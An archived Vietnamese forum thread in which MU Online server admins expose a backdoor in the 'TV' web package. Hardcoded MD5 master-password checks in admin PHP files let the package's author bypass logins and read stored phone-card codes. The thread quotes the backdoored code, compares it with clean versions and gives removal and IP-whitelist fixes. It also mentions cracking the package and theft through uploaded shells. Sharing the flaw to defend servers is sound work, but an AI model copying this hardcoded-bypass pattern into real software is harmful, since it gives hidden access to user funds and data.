View Full Version : [MU] Cảnh báo ai sử dụng TV web 1.85 và 3.0
Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
So sánh với tv 1.85 thì bản 1.85 cũng có.
Các admin mu lưu ý nhé.
Trong file:
Server\admin\security.php
có đoạn code này:
if (md5($_GET['control']) != "e992bbb8e2041788f7ad563b8eeb79d6")
if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
echo "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
exit();
}
?>
dòng bôi đỏ là pass yêu tiên, chỉ TV mới có thể biết pass đó là gì vì nó bị mã hóa md5.
Server\admin\cardphone.php
if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == $passcard || $pass == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['codecard'] = $passcard;
}
đây là file các admin check thẻ mà lại có đoạn này.
trong file này:
Server\admin\view_card.php
if ($_POST[submit]) {
$pass = md5($_POST[viewcard]);
if ($pass == "$passviewcard") $_SESSION['viewcard'] = "$passviewcard";
}
trong file view_card.php lại ko có đoạn này. Vì file này ko xem được seri với mã thẻ, TV ko chèn đoạn pass mã hóa md5 kia vào.
tương tự trong file Server\admin\checkip.php
cũng có đoạn code đó:
if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;
}
mục đích của đoạn này là check ip mà khi ko biết pass
Nếu các bạn ko tin thì có thể so sánh với NBB web:
Server\admin\cardphone.php
if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == "$passcard") $_SESSION['codecard'] = "$passcard";
}
trong server/admin/checkip.php của NBB cũng hoàn toàn khác với TV:
if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == "$passcode") $_SESSION['code'] = "$passcode";
}
Trên là các file nguy hiểm, nó ko sử dụng shell. Khi quét virus ko phát hiện là có shell
Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.
Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6
ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền 8-x
mrrainnt
31-12-11, 04:33 PM
Cái này bản 1.85 cũng có đấy chứ ;))! tại mọi người không để ý đấy thôi ^^!
ductruong_kr
31-12-11, 04:36 PM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
mrrainnt
31-12-11, 04:47 PM
Sẵn đang làm cái này ^^! Up luôn cho các bạn folder Admin sạch 100% :D!
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Pass Giải Nén: mrrainnt
Nhớ thanks đấy nhé :-"!
godhoang
31-12-11, 04:48 PM
bản nbb 4.1 free cũng bị nè !
mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !
mrrainnt
31-12-11, 05:01 PM
bản nbb 4.1 free cũng bị nè !
mẹ nó, hôm wa thằng bạn nó nạp 150k, sau đó gh thấy nó có 150k hỏi lạ, hỏi nó nó bảo nạp cái đc ngay 150k
dò log nạp thẻ thì k có, nó bật log thẻ thì ghi "Sv bảo trì"
giờ ghê lắm, up shell trộm mã thẻ đt không hà, fải wa yahoo thôi !
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Sẵn đang làm cái này ^^! Up luôn cho các bạn folder Admin sạch 100% :D!
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
Pass Giải Nén: mrrainnt
Nhớ thanks đấy nhé :-"!
hình như phần admin. của tv1.85 cũng giống 3.0 thì phải
mrrainnt
31-12-11, 05:21 PM
hình như phần admin. của tv1.85 cũng giống 3.0 thì phải
:)! Ừ, Đúng rồi bạn à. nó cũng tương tự nhau thôi bạn à ^^
lengockien
31-12-11, 05:26 PM
Mình đang dezend và crack TV 3.0 thì phát hiện 1 cách chôm thẻ của TV.
So sánh với tv 1.85 thì bản 1.85 cũng có.
Các admin mu lưu ý nhé.
Trong file:
Server\admin\security.php
có đoạn code này:
if (md5($_GET['control']) != "e992bbb8e2041788f7ad563b8eeb79d6")
if ( !in_array($_SERVER['REMOTE_ADDR'], $list_ip) ) {
echo "Ban Khong Phai Thanh Vien BQT thi vao lam gi? he he";
exit();
}
?>
dòng bôi đỏ là pass yêu tiên, chỉ TV mới có thể biết pass đó là gì vì nó bị mã hóa md5.
Server\admin\cardphone.php
if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == $passcard || $pass == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['codecard'] = $passcard;
}
đây là file các admin check thẻ mà lại có đoạn này.
trong file này:
Server\admin\view_card.php
if ($_POST[submit]) {
$pass = md5($_POST[viewcard]);
if ($pass == "$passviewcard") $_SESSION['viewcard'] = "$passviewcard";
}
trong file view_card.php lại ko có đoạn này. Vì file này ko xem được seri với mã thẻ, TV ko chèn đoạn pass mã hóa md5 kia vào.
tương tự trong file Server\admin\checkip.php
cũng có đoạn code đó:
if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;
}
mục đích của đoạn này là check ip mà khi ko biết pass
Nếu các bạn ko tin thì có thể so sánh với NBB web:
Server\admin\cardphone.php
if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == "$passcard") $_SESSION['codecard'] = "$passcard";
}
trong server/admin/checkip.php của NBB cũng hoàn toàn khác với TV:
if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == "$passcode") $_SESSION['code'] = "$passcode";
}
Trên là các file nguy hiểm, nó ko sử dụng shell. Khi quét virus ko phát hiện là có shell
Đó là các file nguy hiểm mà mình phát hiện được, còn các cái khác mình đang tìm hiểu.
Cách chữa: Nếu ai ko biết về code thì vào các file trên xóa các pass md5 đi.
Dòng này là phải xóa nè: e992bbb8e2041788f7ad563b8eeb79d6
ai không tin thì vào bản của Mr.Cuong share, ko có dòng này thì mình chết liền 8-x
tôi thấy rất là hài hước cho các làm mu online đê kiếm tiền và cơm áo mà đơn giản việc cài web ban đầu các bạn cũng không nhận ra để bảo mật. lẽ ra khi làm phải edit toàn bộ chú
các bạn hãy lưu ý kỹ thay đổi mã Md5 đi + edit ip về local 127.0.0.1
=> md5 trong server/admin/checkip.php =>
=> server/admin/listip.txt => nên coi lại cái này nhé cho về 127.0.0.1 => điên ip vào đây là đang nhập admin dc đấy
=> server/admin/security.php => fix luôn đi
=> ngoài server/conifig.php
$list_ip = array (
'127.0.0.1', =>
'115.112.187.78', =>> các bạn config kết nối trên host không nên để nhiều ip ở đây và không để ai biết ip nha vì đang nhập quyền admin bằng cái này được
);
lưu ý nũa phần home
admin
home/admin/config.php => mã md5 cần sửa
home/admin/security.php =>mã md5 cần sửa
home/admin/listip.txt => de ip 127.0.0.1 => chỉ mình trên máy chủ mới vào dc thôi còn bạn điền ip máy khác thì máy đó sẽ đăng nhập admin dc luôn
sorry hơi làng nhàng tí các bác thông cảm giùm
:)! Ừ, Đúng rồi bạn à. nó cũng tương tự nhau thôi bạn à ^^
nó chẳng khác nhau là mấy, chỉ thêm 1 số chức năng thồi. :)
bistro007_hp
31-12-11, 09:21 PM
uhm cái này nhiều bác mất thẻ như chơi nhưng nbb thấy có làm sao đâu :| bắc bác godhoang bị dính sell rùi ;))
godhoang
31-12-11, 09:29 PM
ừh chắc shell rồi
hoặc là thằng đệ hồi trước nó checkip nó vô tình vô lại đc và... :|
god hoàng cho mình hỏi cái yahoo hỏi vài cái với đc k
godhoang
31-12-11, 11:21 PM
god hoàng cho mình hỏi cái yahoo hỏi vài cái với đc k
thắc mắc gì bạn cứ pm thẳng forum cho tiện :)
cái phần tin tức mình bị lỗi .mình xài web tv 3.0.nên mình lấy tin tức của mubentra đấp vào.lúc xài tin tức của tv 3.0 thì phần tin tức nó trắng xóa .còn lúc xài tin tức của mubentra thì hiện đc hot item với bảng vàng. web nè bavuong-mu.cc ai rành vào coi help mình với
khuek8b
01-01-12, 12:11 AM
thì đó,hàng free mà.mình ko phỉa là ngừoi làm ra thì sao biết dc
if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == $passcard || $pass == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['codecard'] = $passcard;
}
à cái đoạn
e992bbb8e2041788f7ad563b8eeb79d6 này hả
đọc code hiểu thôi mà
nếu vào bằng pass quy định hoặc pass tự đặt thì đều vào đc ,ở đây pass tự đặt chính là đoạn mã hóa md5
bạn có thể sửa lại đơn giản như sau :
if ($_POST[submit]) {
$pass = md5($_POST[codecard]);
if ($pass == $passcard) $_SESSION['codecard'] = $passcard;
}
trước có tool giải mã md5 nhưng chắc virus nó ăn mất rồi :D
mrrainnt
01-01-12, 12:19 PM
:))! Vừa được Thiếu Vấn ghé thăm Server nhưng chắc buồn lắm vì chẵng có gì =))! =))! Check IP - Security ở Admin Host cũng bị chèn cái này :)! Để tý tối rảnh up folder admin trên host sạch lên cho mọi người :))
ntquang.info
08-02-12, 10:12 PM
Tự code lại hết cho nó lành =))
thienhoangyb
18-03-12, 12:02 PM
thiếu vân rẻ rách quá...........
phuchungac
30-03-12, 11:39 AM
e k biet fix the nay co dc k
coppy nguyen cai ma md5 do vao nopad c++ roi repall ca thu muc web do di la xong k biet co duoc k may dai ka :D
Phát hiện mới ô chỉ trong securty.php mà còn trong cả file checkip.php
if ($_POST[submit]) {
$code = md5($_POST[code]);
if ($code == $passcode || $code == "e992bbb8e2041788f7ad563b8eeb79d6") $_SESSION['code'] = $passcode;
}
thêm nửa trong 1 số file trong admin Quản Lý cũng có
Powered by vBulletin® Version 4.2.0 Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.